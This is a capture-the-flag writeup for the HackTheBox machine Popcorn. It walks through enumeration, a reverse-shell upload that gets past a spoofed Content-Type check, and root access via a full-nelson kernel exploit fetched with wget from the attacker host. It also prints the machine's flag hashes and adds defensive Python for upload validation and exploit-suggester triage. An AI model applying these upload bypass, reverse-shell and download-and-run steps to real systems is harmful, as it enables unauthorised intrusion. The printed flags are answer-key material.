HackTheBox Popcorn
Writeup for HackTheBox Popcorn
Machine Synopsis
Popcorn, while not overly complicated, contains quite a bit of content and it can be difficult for some users to locate the proper attack vector at first. This machine mainly focuses on different methods of web exploitation. (Source)
Enumeration
```
$ nmap -sC -sV -A 10.10.10.6
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
```
Here is the default webpage.
Running gobuster against the webpage reveals an interesting directory called /torrent.
```
$ gobuster dir -u http://10.10.10.6 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
...
/index                (Status: 200) [Size: 177]
/test                 (Status: 200) [Size: 47032]
/torrent              (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename               (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/]
...
```
There is an option to sign up for an account.
Exploitation
Logging into the newly created account reveals an upload page.
It seems we can upload a torrent file here, but can we upload anything else? Uploading a PHP reverse shell returns the error “This is not a valid torrent file”.
Let’s upload a proper torrent file instead.
It seems that after uploading the torrent, we can edit it!
One of the features allows us to change the screenshot. Perhaps we can do something malicious here?
This time, trying to upload a PHP reverse shell resulted in an “invalid file” error. What if we intercepted the request and changed Content-Type: application/x-php to Content-Type: image/png?
```
HTTP/1.1 200 OK
Date: Wed, 20 Apr 2022 06:48:54 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 138
Connection: close
Content-Type: text/html

Upload: exploit.php<br />Type: image/png<br />Size: 5.3623046875 Kb<br />Upload Completed. <br />Please refresh to see the new screenshot.
```
Great! It works. However, where is the file being uploaded to? Running gobuster on http://10.10.10.6/torrent/ shows that there is an /upload directory.
Execute the reverse shell by clicking on the uploaded file.
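The bypass above works because the screenshot handler accepts whatever Content-Type the client declares and stores the file under the client's own name inside the web root. The following is an added example written for this writeup, not the Torrent Hoster application's code: it places a validator that behaves like the weak check observed here next to a hardened one that sniffs the image magic bytes, requires the declared type to agree with them, bounds the size and generates the stored filename server-side, plus an audit helper that flags files in an upload directory whose bytes are not a recognised image. The function names, the type allow-list and the sample uploads are constructed assumptions; the "PHP" sample bodies are inert placeholders.

```python
"""Server-side screenshot validation: a weak check that trusts the
client-supplied Content-Type (the behaviour seen on Popcorn) beside a
hardened check that inspects the bytes.  Added example for this writeup;
not the Torrent Hoster application's code.  Function names, allow-list and
sample uploads are assumptions constructed here.
"""
import secrets

# Constructed sample uploads: (client filename, declared Content-Type, body)
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SAMPLE_PNG = ("shot.png", "image/png", PNG_MAGIC + b"\x00" * 32)
# The writeup's bypass: a .php upload whose Content-Type header was rewritten
# to image/png in transit.  The body is an inert placeholder, not a shell.
SAMPLE_SPOOFED = ("exploit.php", "image/png", b"<?php echo 'placeholder'; ?>")
SAMPLE_HONEST_PHP = ("exploit.php", "application/x-php", b"<?php echo 'placeholder'; ?>")

# Allowed image types and the leading bytes (magic) each one must start with
MAGIC_BY_TYPE = {
    "image/png": [PNG_MAGIC],
    "image/jpeg": [b"\xff\xd8\xff"],
    "image/gif": [b"GIF87a", b"GIF89a"],
}
EXTENSION_BY_TYPE = {"image/png": ".png", "image/jpeg": ".jpg", "image/gif": ".gif"}
MAX_BYTES = 2 * 1024 * 1024


def weak_check(filename, declared_type, data):
    """Accepts any upload whose declared Content-Type is an image type and
    keeps the client's filename.  A .php file with a forged header passes."""
    if declared_type not in MAGIC_BY_TYPE:
        return None
    return filename


def sniff_type(data):
    """Return the image type whose magic bytes the body starts with, or None."""
    for mime, magics in MAGIC_BY_TYPE.items():
        if any(data.startswith(m) for m in magics):
            return mime
    return None


def strong_check(filename, declared_type, data):
    """Accept the upload only if the body is a recognised image, the declared
    type agrees with the bytes and the size is bounded.  The stored name is
    generated server-side with an extension derived from the bytes, so the
    client's filename (and its extension) never reaches the disk."""
    if not data or len(data) > MAX_BYTES:
        return None
    sniffed = sniff_type(data)
    if sniffed is None or sniffed != declared_type:
        return None
    return secrets.token_hex(16) + EXTENSION_BY_TYPE[sniffed]


def audit_uploads(entries):
    """Detection side: given (stored filename, body) pairs read from an upload
    directory, return the names whose bytes are not a recognised image.
    On Popcorn this would flag exploit.php under /torrent/upload."""
    return [name for name, body in entries if sniff_type(body) is None]


if __name__ == "__main__":
    for sample in (SAMPLE_PNG, SAMPLE_SPOOFED, SAMPLE_HONEST_PHP):
        print(sample[0], sample[1],
              "weak:", weak_check(*sample), "strong:", strong_check(*sample))
    print("flagged:", audit_uploads([(s[0], s[2]) for s in (SAMPLE_PNG, SAMPLE_SPOOFED)]))
```

Content sniffing closes the header-spoofing hole, but the upload directory should still be served with script execution disabled (for mod_php, `php_flag engine off` in that directory's Apache configuration) so that a validation bug cannot turn into code execution on its own.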
```
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.6] 34129
...
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -r
2.6.31-14-generic-pae
```
Privilege Escalation
Running Linux Exploit Suggester lists some possible vulnerabilities.
```
$ wget http://10.10.14.9:8000/les.sh
$ chmod +x les.sh
$ ./les.sh
...
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
   Details: http://vulnfactory.org/exploits/full-nelson.c
   Exposure: highly probable
   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
   Download URL: http://vulnfactory.org/exploits/full-nelson.c

[+] [CVE-2016-5195] dirtycow
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
...
```
It seems the machine is highly likely to be vulnerable to the full-nelson local privilege escalation exploit!
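Defenders run the same suggester during assessments and usually want its findings as records (CVE list, exposure, reference URL) rather than a wall of text, so they can be ranked and turned into patch tickets. The parser below is an added example for this writeup, not part of linux-exploit-suggester: it reads the output format shown above into dictionaries and sorts them by exposure. The sample text is a constructed excerpt in that format with the tag lists shortened, and the ordering of the exposure labels is an assumption based on the labels visible in the output.

```python
"""Parser for the Linux Exploit Suggester output format shown above, so the
findings can be ranked for patch triage instead of read by eye.  Added
example for this writeup; not part of linux-exploit-suggester.  Field
names and the exposure ranking are assumptions based on the visible labels.
"""
import re

# Constructed excerpt in the same format as the tool output in the writeup
# (tag lists shortened; not a live scan).
LES_OUTPUT = """\
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
   Details: http://vulnfactory.org/exploits/full-nelson.c
   Exposure: highly probable
   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
   Download URL: http://vulnfactory.org/exploits/full-nelson.c

[+] [CVE-2016-5195] dirtycow
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: probable
   Tags: debian=7|8,ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
"""

# "[+] [CVE-a,CVE-b] name" opens a finding; following "Key: value" lines belong to it
HEADER_RE = re.compile(r"^\[\+\]\s+\[([^\]]+)\]\s+(\S+)")
FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z ]*?):\s+(.*)$")

# Assumed ordering of the exposure labels, most to least likely
EXPOSURE_RANK = {"highly probable": 0, "probable": 1, "less probable": 2, "unprobable": 3}


def parse_les(text):
    """Return one dict per finding: name, cves (list) and the lower-cased
    field names (details, exposure, tags, download_url, comments).
    Lines before the first finding (banner, stray cat error) are ignored."""
    findings = []
    current = None
    for line in text.splitlines():
        header = HEADER_RE.match(line)
        if header:
            current = {"name": header.group(2),
                       "cves": header.group(1).split(",")}
            findings.append(current)
            continue
        field = FIELD_RE.match(line)
        if field and current is not None:
            key = field.group(1).strip().lower().replace(" ", "_")
            current[key] = field.group(2).strip()
    return findings


def prioritize(findings):
    """Sort findings by exposure (most likely first), then by CVE count."""
    return sorted(findings,
                  key=lambda f: (EXPOSURE_RANK.get(f.get("exposure", ""), 99),
                                 -len(f["cves"])))


if __name__ == "__main__":
    for f in prioritize(parse_les(LES_OUTPUT)):
        print(f"{f['exposure']:>16}  {f['name']:<12} {','.join(f['cves'])}")
```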
```
$ wget http://10.10.14.9:8000/full-nelson.c
$ gcc full-nelson.c -o full-nelson
$ chmod +x full-nelson
$ ./full-nelson
id
uid=0(root) gid=0(root)
cd /home/george
cat user.txt
c1b9db61d386e3f830c010480ab54077
cd /root
cat root.txt
c5ba80b7f9f478d28cbbf7c59df47478
```